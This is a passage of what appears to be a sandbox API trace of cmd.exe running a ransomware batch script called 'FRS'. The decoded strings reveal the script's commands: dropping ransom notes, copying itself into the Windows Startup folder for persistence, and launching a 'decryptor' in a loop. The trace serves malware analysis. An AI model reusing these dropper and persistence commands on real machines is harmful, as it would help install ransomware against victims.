%MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\nSOMWARE\\Chinese_national_flag.png") returned 84 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0073.213] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.213] GetFileType (hFile=0x254) returned 0x1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0073.213] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0073.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0073.213] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.213] GetFileType (hFile=0x254) returned 0x1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0073.213] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0073.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\nese_national_flag.png") returned 96 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0073.213] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.213] GetFileType (hFile=0x254) returned 0x1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0073.213] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0073.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0073.214] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.214] GetFileType (hFile=0x254) returned 0x1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0073.214] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0073.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\nse_national_flag.png") returned 97 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0073.214] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.214] GetFileType (hFile=0x254) returned 0x1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0073.214] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0073.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0073.214] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.214] GetFileType (hFile=0x254) returned 0x1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0073.214] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0073.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0073.214] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.214] GetFileType (hFile=0x254) returned 0x1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0073.214] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.214] SetFilePointer (in: hFile=0x254, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0073.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0073.215] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.215] GetFileType (hFile=0x254) returned 0x1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0073.215] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0073.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0073.215] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.215] GetFileType (hFile=0x254) returned 0x1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0073.215] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0073.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0073.215] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.215] GetFileType (hFile=0x254) returned 0x1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0073.215] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0073.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0073.215] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.215] GetFileType (hFile=0x254) returned 0x1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0073.215] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0073.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0073.215] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0073.216] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.216] GetFileType (hFile=0x254) returned 0x1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0073.216] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0073.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0073.216] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.216] GetFileType (hFile=0x254) returned 0x1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0073.216] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0073.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0073.216] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.216] GetFileType (hFile=0x254) returned 0x1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0073.216] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0073.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0073.216] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.216] GetFileType (hFile=0x254) returned 0x1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0073.216] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0073.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0073.216] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0073.216] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.216] GetFileType (hFile=0x254) returned 0x1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0073.217] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0073.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0073.217] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.217] GetFileType (hFile=0x254) returned 0x1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0073.217] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0073.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0073.217] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.217] GetFileType (hFile=0x254) returned 0x1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0073.217] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0073.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0073.217] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.217] GetFileType (hFile=0x254) returned 0x1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0073.217] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0073.217] SetFilePointer (in: hFile=0x254, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0073.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0073.217] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0073.218] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.218] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0073.218] _get_osfhandle (_FileHandle=0) returned 0x24 [0073.218] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0073.219] SetConsoleInputExeNameW () returned 0x1 [0073.219] GetConsoleOutputCP () returned 0x1b5 [0073.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0073.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.219] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0073.219] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0073.219] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.219] SetFilePointer (in: hFile=0x254, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0073.219] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0073.219] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0073.219] SetFilePointer (in: hFile=0x254, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0073.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0073.219] GetFileType (hFile=0x254) returned 0x1 [0073.220] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.220] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0073.220] _tell (_FileHandle=3) returned 2512 [0073.220] _close (_FileHandle=3) returned 0 [0073.220] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0073.220] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0073.220] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0073.220] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0073.220] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0073.220] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0073.220] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0073.220] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0073.220] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0073.220] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0073.220] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0073.220] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0073.220] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0073.220] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0073.220] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0073.220] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0073.220] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0073.220] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0073.220] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0073.220] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0073.220] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0073.220] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0073.220] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0073.220] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0073.220] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0073.220] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0073.220] _wcsicmp (_String1="ping", _String2="START") returned -3 [0073.220] _wcsicmp (_String1="ping", 